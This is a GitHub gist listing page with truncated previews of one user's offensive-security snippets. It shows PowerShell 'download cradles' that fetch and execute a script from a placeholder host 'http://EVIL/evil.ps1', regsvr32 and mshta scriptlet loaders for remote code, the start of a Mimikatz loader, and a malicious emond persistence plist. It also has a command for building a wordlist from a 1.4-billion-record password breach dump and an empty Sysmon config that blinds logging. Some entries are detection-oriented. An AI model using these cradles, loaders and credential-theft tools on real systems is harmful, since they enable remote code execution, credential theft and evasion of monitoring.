Adam M Toscher W00t3k
W00t3k
/ breachcompilation.txt
Created
December 20, 2017 00:51
1.4 billion password breach compilation wordlist
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wordlist created from original 41G stash via: | |
| grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt | |
| Then, compressed with: | |
| 7z a breachcompilation.txt.7z breachcompilation.txt | |
| Size: |
W00t3k
/ DownloadCradles.ps1
Created
January 14, 2018 14:31
— forked from ConsciousHacker/DownloadCradles.ps1
Download Cradles
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
W00t3k
/ Backdoor-Minimalist.sct
Created
January 15, 2018 16:07
— forked from enigma0x3/Backdoor-Minimalist.sct
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| progid="PoC" | |
| classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
| <!-- Proof Of Concept - Casey Smith @subTee --> | |
| <!-- License: BSD3-Clause --> | |
| <script language="JScript"> | |
| <![CDATA[ | |
W00t3k
/ mimikatz.sct
Created
January 19, 2018 15:59
Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:http://127.0.0.1:8000/mshta.sct").Exec(); log coffee exit"
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Bandit" | |
| progid="Bandit" | |
| version="1.00" | |
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
| > |
W00t3k
/ Invoke-MimikatzSharp.cs.ps1
Created
January 19, 2018 16:29
Invoke-Mimikatz.cs.ps1 Invokes x86 or x64 Mimiktaz Inside of PowerShell Process
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Source = @" | |
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| using System.Security.Cryptography; |
W00t3k
/ SampleRules.plist
Created
January 19, 2018 16:41
— forked from xorrior/SampleRules.plist
Sample Plist for emond
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> | |
| <plist version="1.0"> | |
| <array> | |
| <dict> | |
| <key>name</key> | |
| <string>sample rule</string> | |
| <key>enabled</key> | |
| <true/> | |
| <key>eventTypes</key> |
W00t3k
/ emond-examples.txt
Created
January 19, 2018 16:41
— forked from xorrior/emond-examples.txt
fswatch and osquery command syntax w/ output
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Fswatch command | |
| fswatch -r --format="'{\"path\": \"%p\", \"timestamp\":\"%t\", \"flag\": \"%f\"}'" /etc/emond.d/rules/ | |
| Output when event is triggered | |
| '{"path": "/private/etc/emond.d/rules/test.plist", "timestamp":"Tue Jan 16 21:17:24 2018", "flag": "PlatformSpecific IsFile"}' | |
| osquery.results.log output from event. | |
| {"name":"file_events","hostIdentifier":"host","calendarTime":"Thu Jan 11 07:00:10 2018 UTC","unixTime":"1515654010","epoch":"0","counter":"0","columns":{"action":"CREATED","atime":"1515653980","category":"emond","ctime":"1515653980","gid":"0","hashed":"1","inode":"1316814","md5":"b1f38ed6d9dca2d33ce733d51617e900","mode":"0644","mtime":"1515653980","sha1":"003a4a25662147ca19692dd01d2d7e06ea751c5e","sha256":"f26ee0eab108d3794426f609ccd878d7a7057e2fab3bea215152e4f35c82b0cf","size":"986","target_path":"\/private\/etc\/emond.d\/rules\/test.plist","time":"1515653983","transaction_id":"2101010","uid":"0"},"action":"added"} |
W00t3k
/ bad.plist
Created
January 19, 2018 16:42
— forked from xorrior/bad.plist
Example Malicious emond plist
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> | |
| <plist version="1.0"> | |
| <array> | |
| <dict> | |
| <key>name</key> | |
| <string>empire rules</string> | |
| <key>enabled</key> | |
| <true/> | |
| <key>eventTypes</key> |
W00t3k
/ EmptyConfig.xml
Created
January 19, 2018 16:47
— forked from mattifestation/EmptyConfig.xml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Sysmon schemaversion="4fuckyou"> | |
| <HashAlgorithms>md5,sha1</HashAlgorithms> | |
| <EventFiltering> | |
| <ProcessCreate onmatch="include"> | |
| </ProcessCreate> | |
| <FileCreateTime onmatch="include"> | |
| </FileCreateTime> | |
| <NetworkConnect onmatch="include"> | |
| </NetworkConnect> | |
| <ProcessTerminate onmatch="include"> |
W00t3k
/ GetSTLCertHashes.ps1
Created
January 19, 2018 16:47
— forked from mattifestation/GetSTLCertHashes.ps1
A crude authroot.stl parser
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # http://www.bouncycastle.org/csharp/ | |
| $BouncyCastlePath = 'Path\To\BouncyCastle.Crypto.dll' | |
| $BouncyCastle = Add-Type -Path $BouncyCastlePath -PassThru | |
| function Get-TrustedRootCertificateHash { | |
| [OutputType([String])] | |
| [CmdletBinding()] | |
| param ( | |
| [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] |
OlderNewer